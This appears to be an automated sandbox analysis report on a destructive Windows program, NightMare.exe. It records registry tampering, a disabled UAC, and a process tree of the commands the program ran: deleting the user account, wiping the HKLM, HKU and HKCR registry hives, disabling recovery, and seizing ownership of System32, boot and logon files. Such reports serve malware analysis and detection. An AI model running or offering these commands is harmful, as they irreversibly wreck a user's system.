| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(5161).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(6942).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(7367).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(9285).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(1024).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(3587).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(4309).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(7531).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(3778).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(3880).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(6548).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(7668).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(934).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(1487).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(2591).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(3531).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(7772).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(7853).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(8824).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(9623).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(2519).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(4974).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(6225).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(8187).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(4080).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(1164).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(1848).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| File created | C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(3348).txt | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
Enumerates physical storage devices
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Control Panel
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Control Panel\Cursors\Help = "C:\\Windows\\WinSxS\\amd64_microsoft-windows-shell-cursors_31bf3856ad364e35_10.0.19041.1_none_01289c50fa22c737\\aero_unavail_xl.cur" | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Control Panel\Cursors\SizeNESW = "C:\\Windows\\WinSxS\\amd64_microsoft-windows-shell-cursors_31bf3856ad364e35_10.0.19041.1_none_01289c50fa22c737\\aero_unavail_xl.cur" | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Control Panel\Cursors\SizeNWSE = "C:\\Windows\\WinSxS\\amd64_microsoft-windows-shell-cursors_31bf3856ad364e35_10.0.19041.1_none_01289c50fa22c737\\aero_unavail_xl.cur" | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Control Panel\Cursors\UpArrow = "C:\\Windows\\WinSxS\\amd64_microsoft-windows-shell-cursors_31bf3856ad364e35_10.0.19041.1_none_01289c50fa22c737\\aero_unavail_xl.cur" | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Control Panel\Cursors\Hand = "C:\\Windows\\WinSxS\\amd64_microsoft-windows-shell-cursors_31bf3856ad364e35_10.0.19041.1_none_01289c50fa22c737\\aero_unavail_xl.cur" | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Control Panel\Cursors\NWPen = "C:\\Windows\\WinSxS\\amd64_microsoft-windows-shell-cursors_31bf3856ad364e35_10.0.19041.1_none_01289c50fa22c737\\aero_unavail_xl.cur" | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Control Panel\Cursors\SizeWE = "C:\\Windows\\WinSxS\\amd64_microsoft-windows-shell-cursors_31bf3856ad364e35_10.0.19041.1_none_01289c50fa22c737\\aero_unavail_xl.cur" | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\WinSxS\\amd64_microsoft-windows-shell-cursors_31bf3856ad364e35_10.0.19041.1_none_01289c50fa22c737\\aero_unavail_xl.cur" | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Control Panel\Cursors\Arrow = "C:\\Windows\\WinSxS\\amd64_microsoft-windows-shell-cursors_31bf3856ad364e35_10.0.19041.1_none_01289c50fa22c737\\aero_unavail_xl.cur" | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Control Panel\Cursors\SizeAll = "C:\\Windows\\WinSxS\\amd64_microsoft-windows-shell-cursors_31bf3856ad364e35_10.0.19041.1_none_01289c50fa22c737\\aero_unavail_xl.cur" | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Control Panel\Cursors\SizeNS = "C:\\Windows\\WinSxS\\amd64_microsoft-windows-shell-cursors_31bf3856ad364e35_10.0.19041.1_none_01289c50fa22c737\\aero_unavail_xl.cur" | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Control Panel\Cursors\ = "C:\\Windows\\WinSxS\\amd64_microsoft-windows-shell-cursors_31bf3856ad364e35_10.0.19041.1_none_01289c50fa22c737\\aero_unavail_xl.cur" | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Control Panel\Cursors\No = "C:\\Windows\\WinSxS\\amd64_microsoft-windows-shell-cursors_31bf3856ad364e35_10.0.19041.1_none_01289c50fa22c737\\aero_unavail_xl.cur" | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Control Panel\Cursors\Wait = "C:\\Windows\\WinSxS\\amd64_microsoft-windows-shell-cursors_31bf3856ad364e35_10.0.19041.1_none_01289c50fa22c737\\aero_unavail_xl.cur" | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
Modifies File Icons
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Shell Icons\3 | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Shell Icons\4 | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\Wow6432Node\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5}\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\Wow6432Node | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\icmfile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\icofile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\xmlfile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\jarfile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\inifile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\JSEFile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\Wow6432Node\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5}\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\Wow6432Node\CLSID\{1248BD21-B584-4EB8-85D0-8EC479CD043B}\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\inffile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\JSFile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\textfile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\Wow6432Node\CLSID\{1248BD21-B584-4EB8-85D0-8EC479CD043B}\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htlm | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\jntfile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\jpegfile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\regfile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ratfile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\zapfile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\dllfile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\jarfile\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htlm\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\pjpegfile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\pngfile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\txtfile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htlm\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\textfile\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\Wow6432Node\CLSID | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\Wow6432Node\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5} | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\sysfile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_CLASSES\Wow6432Node\CLSID\{1248BD21-B584-4EB8-85D0-8EC479CD043B} | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\giffile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\mscfile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\pnffile\DefaultIcon\ | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\sysfile\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Runs net.exe
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\NightMare.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\NightMare.exe
"C:\Users\Admin\AppData\Local\Temp\NightMare.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k net user %username% /delete && exit
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k reg delete HKCR && exit
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k reg delete HKU && exit
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k reg delete HKLM && exit
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI && pause
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k reagentc.exe /disable && pause
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k color 47 && takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && Exit
C:\Windows\SysWOW64\net.exe
net user Admin /delete
C:\Windows\SysWOW64\reg.exe
reg delete HKU
C:\Windows\SysWOW64\reg.exe
reg delete HKCR
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user Admin /delete
C:\Windows\SysWOW64\takeown.exe
takeown /F C:\Windows\Boot\DVD\EFI
C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\System32
C:\Windows\SysWOW64\ReAgentc.exe
reagentc.exe /disable
C:\Windows\SysWOW64\reg.exe
reg delete HKLM
C:\Windows\SysWOW64\icacls.exe
icacls C:\Windows\System32 /grant Admin:F
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI && pause
C:\Windows\SysWOW64\takeown.exe
takeown /F C:\Windows\Boot\DVD\EFI
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\system32\taskmgr.exe && pause
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\system32\LogonUI.exe && pause
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI\BCD && pause
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI\boot.sdi && pause
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\system32\drivers && pause
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\servicing\TrustedInstaller.exe && pause
C:\Windows\SysWOW64\takeown.exe
takeown /F C:\Windows\system32\taskmgr.exe
C:\Windows\SysWOW64\takeown.exe
takeown /F C:\Windows\system32\LogonUI.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\System32\WUDFHost.exe && pause
C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM fontdrvhost.exe /F
C:\Windows\SysWOW64\takeown.exe
takeown /F C:\Windows\system32\drivers
C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM dwm.exe.exe /F
C:\Windows\SysWOW64\takeown.exe
takeown /F C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM TrustedInstaller.exe.exe /F
C:\Windows\SysWOW64\takeown.exe
takeown /F C:\Windows\System32\WUDFHost.exe
C:\Windows\SysWOW64\takeown.exe
takeown /F C:\Windows\Boot\DVD\EFI\BCD
C:\Windows\SysWOW64\takeown.exe
takeown /F C:\Windows\Boot\DVD\EFI\boot.sdi
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI && pause
C:\Windows\SysWOW64\takeown.exe
takeown /F C:\Windows\Boot\DVD\EFI
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI && pause
C:\Windows\SysWOW64\takeown.exe
takeown /F C:\Windows\Boot\DVD\EFI
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI && pause
C:\Windows\SysWOW64\takeown.exe
takeown /F C:\Windows\Boot\DVD\EFI
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI && pause
C:\Windows\SysWOW64\takeown.exe
takeown /F C:\Windows\Boot\DVD\EFI
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI && pause
C:\Windows\SysWOW64\takeown.exe
takeown /F C:\Windows\Boot\DVD\EFI
C:\Windows\SysWOW64\cmd.exe
